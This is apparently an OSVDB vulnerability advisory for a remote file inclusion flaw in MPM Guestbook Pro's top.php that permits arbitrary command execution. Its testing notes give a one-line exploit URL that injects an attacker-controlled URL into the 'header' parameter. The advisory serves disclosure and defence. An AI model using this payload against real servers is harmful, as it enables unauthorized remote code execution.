MPM Guestbook Pro top.php Arbitrary Command Execution

2005-01-12T17:31:38
ID OSVDB:12891
Type osvdb
Reporter OSVDB
Modified 2005-01-12T17:31:38

Description

Manual Testing Notes

http://[victim]/gbpro/top.php?header=http://[CMD]

References:

Vendor URL: http://mpm.pahviloota.net/ Security Tracker: 1012889 Secunia Advisory ID:13849 Related OSVDB ID: 12892 Other Advisory URL: http://www.systemsecure.org/public/ss11012005.txt Keyword: Remote File Inclusion